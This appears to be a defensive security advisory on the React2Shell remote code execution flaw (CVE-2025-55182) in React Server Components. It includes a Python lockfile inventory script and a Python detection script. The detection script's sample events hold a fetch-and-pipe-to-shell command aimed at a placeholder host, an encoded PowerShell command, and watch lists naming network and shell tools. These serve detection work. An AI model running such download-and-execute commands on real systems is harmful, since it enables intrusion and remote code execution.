Mitigating the React2Shell Vulnerability in React Server Components


Key Takeaways:

  • CVE-2025-55182 is a critical pre-authentication remote code execution (RCE) vulnerability affecting React Server Components, Next.js, and related frameworks.
  • The vulnerability has a CVSS score of 10.0 and can be exploited through a single malicious HTTP request.
  • Attackers can use this vulnerability to execute arbitrary code on vulnerable servers, leading to potential data breaches, lateral movement, and other malicious activities.
  • Microsoft recommends patching affected systems, prioritizing internet-facing workloads, and using Microsoft Defender Vulnerability Management (MDVM) to surface vulnerable package inventory and track remediation progress.
  • Customers can use Microsoft Defender XDR, Microsoft Defender for Cloud, and Microsoft Security Copilot to detect and respond to threats related to this vulnerability.

Introduction to CVE-2025-55182
CVE-2025-55182, also referred to as React2Shell, is a critical pre-authentication remote code execution (RCE) vulnerability affecting React Server Components, Next.js, and related frameworks. With a CVSS score of 10.0, it allows an unauthenticated attacker to execute arbitrary code on a vulnerable server with a single malicious HTTP request. The root cause is insufficient validation of incoming payloads in affected React Server Components versions: an attacker can inject crafted structures that React accepts as valid, leading to prototype pollution and, from there, remote code execution.

Exploitation Activity
The React Server Components ecosystem is the set of packages, frameworks, and bundlers that let React 19 applications run parts of their logic on the server rather than in the browser. Exploitation activity against it was detected as early as December 5, 2025. Most successful exploits originated from red team assessments, but real-world exploitation by threat actors has also been observed, with attackers delivering multiple follow-on payloads, including coin miners. Both Windows and Linux environments have been impacted.

Vulnerability Factors
Several factors make this vulnerability a high-impact, low-friction attack path against modern React Server Components deployments: default configurations are vulnerable, public proof-of-concept exploits are readily available, no authentication is required, and a single malicious HTTP request is enough to exploit it.

Mitigation and Protection Guidance
Microsoft recommends that customers act on several mitigation recommendations: follow the manual identification guidance to find affected packages, patch immediately, prioritize internet-exposed services, monitor for exploit activity, and add WAF protections where appropriate. Customers can use Microsoft Defender Vulnerability Management (MDVM) to surface vulnerable package inventory and track remediation progress across their estate. Microsoft Defender XDR customers can refer to the applicable Defender XDR detections to detect and respond to related threats.
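One way to do the manual identification step is to read the installed versions straight out of the npm lockfile rather than trusting a top-level `npm ls`, because a transitive dependency can carry its own nested copy of a React Server Components package at a different version. The script below is an added example and is not Microsoft's or the React project's tooling; the set of watched package names, the placeholder versions, and the sample lockfile are constructed for illustration, and the vendor advisory remains the authority on which versions are fixed.

```python
"""Inventory React Server Components packages from an npm lockfile, including nested
(transitive) copies that a top-level `npm ls` may hide.

Added example for the manual identification step; not Microsoft's or the React
project's tooling. Package names and sample data are constructed assumptions."""
import json
from typing import Dict, Set

# Assumption: these are the package names to compare against the vendor advisory's
# fixed versions. The advisory, not this list, is authoritative.
WATCHED = {
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
    "next",
}


def package_name(path: str) -> str:
    """Install path -> package name, keeping npm scopes intact.

    'node_modules/next/node_modules/@scope/pkg' -> '@scope/pkg'
    """
    return path.rsplit("node_modules/", 1)[-1]


def inventory(lock: dict) -> Dict[str, Set[str]]:
    """Map watched package name -> {'<version> @ <install path>', ...} for every copy.

    Handles lockfileVersion 2/3 (flat "packages" map keyed by install path) and
    lockfileVersion 1 (nested "dependencies" tree). v2 files carry both keys, so the
    v1 walker is only used when "packages" is absent.
    """
    found: Dict[str, Set[str]] = {}

    for path, meta in lock.get("packages", {}).items():
        if not path:  # "" is the root project itself
            continue
        name = meta.get("name") or package_name(path)  # aliased installs set "name"
        if name in WATCHED:
            found.setdefault(name, set()).add(f"{meta.get('version', '?')} @ {path}")

    def walk(deps: dict, prefix: str) -> None:
        for name, meta in deps.items():
            path = f"{prefix}node_modules/{name}"
            if name in WATCHED:
                found.setdefault(name, set()).add(f"{meta.get('version', '?')} @ {path}")
            walk(meta.get("dependencies", {}), path + "/")

    if "packages" not in lock:
        walk(lock.get("dependencies", {}), "")
    return found


# Constructed sample lockfile (not from a real project). Note the second, nested copy
# of react-server-dom-webpack pulled in by a UI library at a different version.
SAMPLE_LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "shop-frontend", "dependencies": {"next": "^19", "some-ui-kit": "^1"}},
        "node_modules/next": {"version": "19.1.1"},
        "node_modules/react": {"version": "19.1.1"},
        "node_modules/react-server-dom-webpack": {"version": "19.1.1"},
        "node_modules/some-ui-kit": {"version": "1.4.0"},
        "node_modules/some-ui-kit/node_modules/react-server-dom-webpack": {"version": "19.0.0"},
    },
}


def report(lock: dict) -> str:
    """Human-readable listing, one line per installed copy."""
    lines = []
    for name in sorted(inventory(lock)):
        for entry in sorted(inventory(lock)[name]):
            lines.append(f"{name}: {entry}")
    return "\n".join(lines)


if __name__ == "__main__":
    import sys
    lock = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_LOCK
    print(report(lock))
```

Run it as `python inventory.py package-lock.json` on each deployed service; every line is one installed copy to check against the advisory, and a fixed top-level version does not clear a nested older copy.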

Microsoft Defender XDR Detections
Microsoft Defender XDR includes detections for potential React2Shell command injection attempts, encoded PowerShell execution, and suspicious commands spawned by the next-server parent process. These detections are integrated with automatic attack disruption, which can initiate autonomous containment actions to stop an in-progress attack and prevent further progression.

Hunting Queries and Recommendations
Microsoft Defender XDR customers can also use hunting queries to find related activity in their environments, covering the same patterns: potential React2Shell command injection attempts, encoded PowerShell execution, and suspicious commands spawned by the next-server parent process. Microsoft Defender for Cloud customers can use security explorer templates to locate exposed containers running vulnerable container images and vulnerable virtual machines.
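The three detection patterns named in the two sections above (commands spawned by the next-server parent, encoded PowerShell, and download-and-execute one-liners) can be reduced to a few process-creation heuristics that work on any EDR or audit log export. The script below is an added example, not Microsoft's Defender XDR detections or hunting queries, which are not reproduced on this page. The rule names, the sample events, the TEST-NET address, and the assumption that the Next.js process title starts with `next-server` are constructed for illustration.

```python
"""Triage heuristics for React2Shell-style post-exploitation over process-creation events.

Added example; the rules and sample telemetry are constructed and are not Microsoft's
Defender XDR detections or hunting queries."""
import base64
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Assumption: Next.js sets its process title to "next-server (v<version>)", so the
# parent process name recorded in telemetry starts with "next-server".
RSC_PARENT_PREFIX = "next-server"
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh", "pwsh.exe"}
RECON_OR_FETCH = {"whoami", "id", "uname", "curl", "wget", "certutil.exe", "nc", "ncat", "busybox"}
POWERSHELL = {"powershell.exe", "pwsh", "pwsh.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...),
# followed by a base64 blob of UTF-16LE script text.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]{16,})")
# curl/wget output (or a base64 decode) piped straight into a shell.
PIPE_TO_SHELL = re.compile(r"(?i)\b(?:curl|wget|base64\s+-d)\b[^|]*\|\s*(?:ba|z|da)?sh\b")


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent_name: str  # image name or process title of the parent
    image: str        # child image path (Linux or Windows style)
    cmdline: str


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def basename(image: str) -> str:
    """'/bin/sh' -> 'sh'; 'C:\\Windows\\System32\\cmd.exe' -> 'cmd.exe'."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)  # binascii.Error is a ValueError
        return raw.decode("utf-16-le").strip("\x00 \r\n")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev: ProcessEvent) -> List[Finding]:
    """Apply all three rules to one event; an event may trigger more than one."""
    findings: List[Finding] = []
    child = basename(ev.image)
    if ev.parent_name.lower().startswith(RSC_PARENT_PREFIX) and child in SHELLS | RECON_OR_FETCH:
        findings.append(Finding(ev.host, "next-server-spawned-shell", f"{ev.parent_name} -> {ev.cmdline}"))
    if child in POWERSHELL:
        decoded = decode_encoded_powershell(ev.cmdline)
        if decoded is not None:
            findings.append(Finding(ev.host, "encoded-powershell", decoded))
    if PIPE_TO_SHELL.search(ev.cmdline):
        findings.append(Finding(ev.host, "download-and-execute", ev.cmdline))
    return findings


def hunt(events: Iterable[ProcessEvent]) -> List[Finding]:
    return [f for ev in events for f in classify(ev)]


# Constructed sample telemetry (not real events). 203.0.113.5 is a TEST-NET address.
ENC = base64.b64encode("whoami".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent("web-01", "next-server (vX.Y.Z)", "/bin/sh", 'sh -c "curl -s http://203.0.113.5/x.sh | sh"'),
    ProcessEvent("web-02", "next-server (vX.Y.Z)", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 f"powershell.exe -nop -w hidden -enc {ENC}"),
    ProcessEvent("web-01", "next-server (vX.Y.Z)", "/usr/bin/node", "node worker.js"),  # benign child
    ProcessEvent("web-03", "systemd", "/usr/bin/node", "node server.js"),              # benign parent
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host:8} {f.rule:28} {f.detail}")
```

The first rule is the one to tune: a next-server parent that spawns a shell is rare in a healthy deployment, so the allow-list of child images should start empty and grow only from confirmed build or health-check scripts. Decoding the PowerShell payload at detection time, rather than alerting on the flag alone, gives the responder the actual command in the alert.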

Conclusion
CVE-2025-55182 represents a high-impact, low-friction attack path against modern React Server Components deployments. Rapid patching, combined with layered Defender monitoring and WAF protections, is the strongest short-term and long-term risk reduction strategy. Microsoft recommends that customers prioritize patching affected systems and use Microsoft Defender Vulnerability Management (MDVM) to surface vulnerable package inventory and track remediation progress. Following these recommendations and using the available detections and hunting queries lets customers detect and respond to threats related to this vulnerability and reduce the risk of exploitation.
